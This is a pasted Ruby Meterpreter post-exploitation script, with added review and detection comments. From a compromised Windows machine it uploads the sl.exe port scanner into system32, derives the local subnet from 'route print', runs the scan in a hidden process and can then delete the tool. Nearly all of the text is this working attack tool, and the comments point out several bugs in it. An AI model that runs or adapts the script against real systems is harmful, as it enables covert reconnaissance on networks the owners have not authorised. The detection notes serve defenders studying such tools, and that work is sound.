
Untitled

a guest
Aug 4th, 2017
  1. #!/usr/bin/env ruby
  2. require 'ftools'
  3. ############################################################
  4. #     This is a Meterpreter script that port-scans the     #
  5. #network the controlled computer is on,                    #
  6. #using a portscanner called sl.exe                         #
  7. #                                                          #
  8. ############################################################
  9. #   If netmask isn't 255.255.255.0 it must work any way    #
  10. ############################################################
  11. #   Tested in Win2003 and WinXP                            #
  12. ############################################################
  13. #   Created by Augusto Pereyra aepereyra(at)gmail.com      #
  14. ############################################################
  15. #   Made Awesome by PodJackel, podjackel@gmail.com         #
  16. ############################################################
  17.  
  18.  
  # Command-line switches accepted by the script. Each switch maps to a
  # two-element array: whether the switch takes a value, then its help text
  # (the Rex::Parser::Arguments convention).
  #
  # NOTE(review): "-s" and "-d" are declared as taking no value, although their
  # help text describes a path and the option handler at the end of the script
  # reads `val` for both. With this table `val` is presumably nil for those two
  # switches -- confirm against Rex::Parser::Arguments.
  @@exec_opts = Rex::Parser::Arguments.new(
    "-h"  => [ false,  "Help menu."],
    "-r"  => [ true,  "To set the range manualy"],
    "-a"  => [ false,  "For automatic lan detection and port scan"],
    "-s"  => [ false,  "Tool Source Path (Default: /pentest/windows-binaries/scanners/sl.exe)"],
    "-d"  => [ false,  "Client Destination Path (Default: %windir%\\system32\\sl.exe)"],
    "-c"   => [ false,  "Delete tool from host after scan"]
  )
  27.  
  28.  
  29. #Function for upload the port scanner
  30.  
  # Copies the scanner binary from the operator's machine to the session host.
  #
  # dst - path on the session host that receives the file
  # src - local path of sl.exe (a port scanner created by Foundstone)
  #
  # Detection note: this is a file write made through the session's file-system
  # API. The default destination named in this script is
  # %windir%\system32\sl.exe, so a new executable at that path is the on-disk
  # artifact of this step.
  def uploadtool(dst, src)
    print_status("Uploading Portscanner to target")
    remote_files = client.fs.file
    remote_files.upload_file(dst, src)
  end
  37.  
  # Deletes the uploaded scanner from the session host.
  #
  # src - path on the session host to remove
  #
  # Only the file named by src is removed; nothing in this function touches
  # logs or other traces of the scan.
  def removetool(src)
    print_status("Removing Portscanner from target")
    remote_files = client.fs.file
    remote_files.rm(src)
  end
  42.  
  43.  
  44. #Function for network autodetection
  45.  
  # Derives the scan range from the session host's routing table.
  #
  # Runs `route print` on the session host as a hidden, channelized process and
  # looks only at the first chunk read from its output. The last line in that
  # chunk matching the default-route pattern is split on whitespace, and its
  # fourth field (presumably the interface address column -- confirm against
  # the `route print` layout of the target OS) has its final octet replaced by
  # 1 and by 254.
  #
  # Returns "a.b.c.1-a.b.c.254", or nil when the channel yields no data.
  # The netmask is never read, so the range always spans a single last octet.
  #
  # NOTE(review): the dots in the pattern are unescaped and match any
  # character. If no line matches, default_route stays empty and the
  # `.split` call below raises NoMethodError on nil.
  # NOTE(review): `each` is called on the chunk itself; that works only where
  # String responds to `each` (Ruby 1.8) -- confirm the runtime.
  #
  # Detection note: the visible side effect on the host is a hidden child
  # process running `route print`.
  def auto()
    default_route = []
    route_proc = client.sys.process.execute("route print", nil, {'Hidden' => true, 'Channelized' => true})
    while (chunk = route_proc.channel.read)
      chunk.each do |line|
        next unless line =~ /( 0.0.0.0)/
        default_route = line.split
        route_proc.channel.close
      end
      address = default_route[3]
      first_host = address.split(".")
      last_host = address.split(".")
      first_host[3] = '1'
      last_host[3] = '254'
      # Returning here means only the first chunk of output is ever inspected.
      return [first_host.join("."), last_host.join(".")].join("-")
    end
  end
  73.  
  74.  
  75. ####################################################################
  76. #Function for Port Scanning#########################################
  77. ####################################################################
  78.  
  # Runs the uploaded scanner on the session host and prints what it returns.
  #
  # iprange - range string handed to the scanner after its -h switch
  # path    - path of the scanner executable on the session host
  #
  # Returns the array of collected output lines. They are written with `puts`,
  # not print_status.
  #
  # NOTE(review): the channel is closed inside the per-line loop, right after
  # the first line is stored, so later reads act on a closed channel. What
  # `read` does then is not visible here -- confirm how much output survives.
  # NOTE(review): `each` is called on the chunk itself; that works only where
  # String responds to `each` (Ruby 1.8) -- confirm the runtime.
  #
  # Detection note: the host sees a hidden child process whose command line is
  # "<path> -q 1000 -c 500 -h <range>", followed by the connection attempts
  # the scanner makes across that range.
  def portscan(iprange, path)
    print_status("Performing portscanning for IP range #{iprange}")

    meterp = client
    meterp.response_timeout = 100
    scan_proc = meterp.sys.process.execute("#{path} -q 1000 -c 500 -h #{iprange}", nil, {'Hidden' => true, 'Channelized' => true})
    output_lines = []
    while (chunk = scan_proc.channel.read)
      chunk.each do |line|
        output_lines << line
        scan_proc.channel.close
      end
    end
    output_lines.each { |entry| puts entry }
  end
  97. #####################################################################
  98. #This is me##########################################################
  99. #####################################################################
  # Prints the two author credit lines through print_status.
  def mysign()
    print_status("Created by Augusto Pereyra, aepereyra at gmail.com")
    print_status("Made Awesome by PodJackel, podjackel@gmail.com")
  end
  106.  
  107. #####################################################################
  108. #  MAIN  ############################################################
  109. #####################################################################
  110. # Parsing of Options
  111.  
  # Script body: read the switches, then upload the scanner, run it and
  # optionally delete it again.
  #
  #   -r <range>  scan the given range
  #   -a          derive the range with auto(); takes precedence over -r
  #   otherwise   print the credits and the usage text
  #
  # NOTE(review): the defaults are stored in the instance variables @WinPath,
  # @ToolPath and @Clean, but the option handler assigns the constants
  # WinPath, ToolPath and Clean, and the dispatch below reads only those
  # constants. The defaults are therefore never consulted, and a constant
  # whose switch was not passed is undefined when it is read.
  range = nil
  porsc = nil

  @WinPath = client.fs.file.expand_path("%windir%\\system32\\sl.exe")
  @ToolPath = "/pentest/windows-binaries/scanners/sl.exe"
  @Clean = 0

  @@exec_opts.parse(args) do |opt, idx, val|
    case opt
    when "-a" then porsc = 2
    when "-r" then range = val
    when "-d" then WinPath = val
    when "-s" then ToolPath = val
    when "-c" then Clean = 1
    end
  end

  # The credits are printed on every path, including the usage fallback.
  mysign()
  if porsc == 2 || !range.nil?
    uploadtool(WinPath, ToolPath)
    range = auto() if porsc == 2
    portscan(range, WinPath)
    removetool(WinPath) if Clean == 1
  else
    print( @@exec_opts.usage)
  end